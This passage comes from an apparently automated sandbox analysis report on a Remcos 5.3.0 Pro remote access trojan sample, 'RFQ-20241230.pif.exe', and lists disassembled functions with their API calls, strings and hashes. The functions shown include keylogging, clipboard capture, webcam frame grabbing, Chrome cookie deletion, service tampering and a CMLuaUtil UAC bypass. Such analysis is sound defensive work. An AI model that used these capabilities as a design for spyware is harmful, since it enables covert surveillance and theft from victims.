                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                            • String ID: p[G
                            • API String ID: 2536120697-440918510
                            • Opcode ID: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
                            • Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
                            • Opcode Fuzzy Hash: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
                            • Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D
                            Function 0041A52B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
                            • InternetCloseHandle.WININET(00000000), ref: 0041A5C3
                            • InternetCloseHandle.WININET(00000000), ref: 0041A5C6
                            Strings
                            • http://geoplugin.net/json.gp, xrefs: 0041A55E
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleOpen$FileRead
                            • String ID: http://geoplugin.net/json.gp
                            • API String ID: 3121278467-91888290
                            • Opcode ID: d6f499ad1e8f2f32babf086a4b04f4711f6d8a57175f587e6094264b919902b7
                            • Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
                            • Opcode Fuzzy Hash: d6f499ad1e8f2f32babf086a4b04f4711f6d8a57175f587e6094264b919902b7
                            • Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA
                            Function 0044FCEB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                            • _free.LIBCMT ref: 0044FD39
                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                            • _free.LIBCMT ref: 0044FD44
                            • _free.LIBCMT ref: 0044FD4F
                            • _free.LIBCMT ref: 0044FDA3
                            • _free.LIBCMT ref: 0044FDAE
                            • _free.LIBCMT ref: 0044FDB9
                            • _free.LIBCMT ref: 0044FDC4
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                            • Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
                            • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                            • Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655
                            Function 00406815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                            Download Yara Rule
                            APIs
                            • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\RFQ-20241230.pif.exe), ref: 00406835
                              • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                              • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                            • CoUninitialize.OLE32 ref: 0040688E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: InitializeObjectUninitialize_wcslen
                            • String ID: C:\Users\user\Desktop\RFQ-20241230.pif.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                            • API String ID: 3851391207-3056437607
                            • Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                            • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                            • Opcode Fuzzy Hash: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                            • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                            Function 0040FED2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59COMMON
                            Download Yara Rule
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                            • int.LIBCPMT ref: 0040FEF2
                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                            • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                            • String ID: h]G
                            • API String ID: 2536120697-1579725984
                            • Opcode ID: d8f58f918af87aba8139413509f4a2dec583dfadb59aca9c2e42155b8cc16817
                            • Instruction ID: faa6495482ffb760010bfa20be6f485864068761b5f97391b19e5f0bde606c56
                            • Opcode Fuzzy Hash: d8f58f918af87aba8139413509f4a2dec583dfadb59aca9c2e42155b8cc16817
                            • Instruction Fuzzy Hash: 10119D3190041AABCB24FBA5C8468DDB7699E85718B20057FF505B72C1EB78AE09C789
                            Function 0040B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                            Download Yara Rule
                            APIs
                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                            • GetLastError.KERNEL32 ref: 0040B2EE
                            Strings
                            • UserProfile, xrefs: 0040B2B4
                            • [Chrome Cookies not found], xrefs: 0040B308
                            • [Chrome Cookies found, cleared!], xrefs: 0040B314
                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteErrorFileLast
                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                            • API String ID: 2018770650-304995407
                            • Opcode ID: d66ece4a976f4d448fc3a6911c1cd710a05d5aa7b72c80177d91237d75f1b396
                            • Instruction ID: 57831ae66bbe87b328e3caf482cfdb9a18bfb77b2c204d956758bc207329a0f7
                            • Opcode Fuzzy Hash: d66ece4a976f4d448fc3a6911c1cd710a05d5aa7b72c80177d91237d75f1b396
                            • Instruction Fuzzy Hash: ED01A23164410557CB0477B5DD6B8AF3624ED50708F60013FF802B22E2FE3A9A0586CE
                            Function 0041BEC0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47memoryCOMMON
                            Download Yara Rule
                            APIs
                            • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                            • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                            • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Console$AllocOutputShowWindow
                            • String ID: Remcos v$5.3.0 Pro$CONOUT$
                            • API String ID: 2425139147-2527699604
                            • Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                            • Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
                            • Opcode Fuzzy Hash: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                            • Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D
                            Function 004064D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: (CG$C:\Users\user\Desktop\RFQ-20241230.pif.exe$BG
                            • API String ID: 0-3480541508
                            • Opcode ID: 436699010963ecd03ae3a912ac3b80d145bf64b66cbd996a99d31e723bd19539
                            • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                            • Opcode Fuzzy Hash: 436699010963ecd03ae3a912ac3b80d145bf64b66cbd996a99d31e723bd19539
                            • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                            Function 0043960C Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                            Download Yara Rule
                            APIs
                            • __allrem.LIBCMT ref: 00439799
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
                            • __allrem.LIBCMT ref: 004397CC
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
                            • __allrem.LIBCMT ref: 00439801
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 1992179935-0
                            • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                            • Instruction ID: 580a0d75dc01f3f4b0c8d364acae3af6b21ca74026922d198920ae34195595c3
                            • Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                            • Instruction Fuzzy Hash: 8581FC71A01B069BE724AE69CC82B5F73A8AF89368F24512FF411D7381E7B8DD018758
                            Function 00444B4D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: __cftoe
                            • String ID:
                            • API String ID: 4189289331-0
                            • Opcode ID: d690f97f113291c3effb6b8aa28ce687caf39a3cd02d4202bbd0543e6a0dd668
                            • Instruction ID: 51d3defa9bee42a6449c1cbae1767e96f335fc55d8793b788aa7c8c1dec457a3
                            • Opcode Fuzzy Hash: d690f97f113291c3effb6b8aa28ce687caf39a3cd02d4202bbd0543e6a0dd668
                            • Instruction Fuzzy Hash: DE510A72900205ABFB249F598C81FAF77A9EFC9324F25421FF814A6291DB3DDD01866D
                            Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNEL32(00000000), ref: 00403E8A
                              • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prologSleep
                            • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                            • API String ID: 3469354165-462540288
                            • Opcode ID: aa6c569e894ef081ae3a77e9f9792835c9671d76e7273c9a8ca675ac56314457
                            • Instruction ID: a615deab89d52a04eef9df102bd8b4982dd8b49b1eab8c4ad016fc0191aaad38
                            • Opcode Fuzzy Hash: aa6c569e894ef081ae3a77e9f9792835c9671d76e7273c9a8ca675ac56314457
                            • Instruction Fuzzy Hash: E941A330A0420196CA14FB79C816AAD3A655B45704F00413FF809A73E2EF7C9A85C7CF
                            Function 00419DFC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                            • String ID:
                            • API String ID: 493672254-0
                            • Opcode ID: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                            • Instruction ID: 40159264159f5a90cd52f9b689d0e8cb5e0ea154c732c405bcbf7063391161e0
                            • Opcode Fuzzy Hash: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                            • Instruction Fuzzy Hash: 09016D311083107AE3118B34EC1EFBF3B5CDB41B70F00023BF626922D1DA68CE8581A9
                            Function 00437E16 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
                            • SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastValue___vcrt_
                            • String ID:
                            • API String ID: 3852720340-0
                            • Opcode ID: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                            • Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
                            • Opcode Fuzzy Hash: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                            • Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C
                            Function 00446ECF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                            • _free.LIBCMT ref: 00446F06
                            • _free.LIBCMT ref: 00446F2E
                            • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                            • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                            • _abort.LIBCMT ref: 00446F4D
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free$_abort
                            • String ID:
                            • API String ID: 3160817290-0
                            • Opcode ID: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                            • Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
                            • Opcode Fuzzy Hash: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                            • Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F
                            Function 00419C30 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                            • Instruction ID: 508c6a04514e5737773cd2f196b8466aacbf0489f3ca208dfe1df169d6e4b917
                            • Opcode Fuzzy Hash: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                            • Instruction Fuzzy Hash: 93F0F6325403147BD3116B25EC89EFF3BACDB85BA1F000036F941921D2DB68CD4685F5
                            Function 00419D32 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                            • Instruction ID: e3947c2d1caeee04707242a29777fdfa1156a9fa4bc9e6dc5536219c00a7af20
                            • Opcode Fuzzy Hash: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                            • Instruction Fuzzy Hash: 88F0C2325002146BD2116B25FC49EBF3AACDB85BA1B00003AFA06A21D2DB38CD4685F9
                            Function 00419D97 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                            • Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
                            • Opcode Fuzzy Hash: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                            • Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8
                            Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Enum$InfoQueryValue
                            • String ID: [regsplt]$DG
                            • API String ID: 3554306468-1089238109
                            • Opcode ID: 04be85a10a65fedb481150b8bc6c203764df31fda0f784146e603b05117797e8
                            • Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
                            • Opcode Fuzzy Hash: 04be85a10a65fedb481150b8bc6c203764df31fda0f784146e603b05117797e8
                            • Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A
                            Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                              • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                              • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                            • __Init_thread_footer.LIBCMT ref: 0040AEA7
                              • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                              • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                            • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
                            • API String ID: 2974294136-4018440003
                            • Opcode ID: d8cc1fc12807fd958afa10ea2d8e05a8c1945a4568a2f4f986646b09a49f41e4
                            • Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
                            • Opcode Fuzzy Hash: d8cc1fc12807fd958afa10ea2d8e05a8c1945a4568a2f4f986646b09a49f41e4
                            • Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D
                            Function 0040A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                            • wsprintfW.USER32 ref: 0040A905
                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: EventLocalTimewsprintf
                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                            • API String ID: 1497725170-248792730
                            • Opcode ID: c45d0d8330676a24f779125fc54340976b5d318e4a9b5b1d8d93ca89959c89e3
                            • Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
                            • Opcode Fuzzy Hash: c45d0d8330676a24f779125fc54340976b5d318e4a9b5b1d8d93ca89959c89e3
                            • Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
                            Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                            • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                            • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSizeSleep
                            • String ID: `AG
                            • API String ID: 1958988193-3058481221
                            • Opcode ID: 1410e1d813e280eb6b4e08600abbe884787e407ed37892b11411430ae0a0b870
                            • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
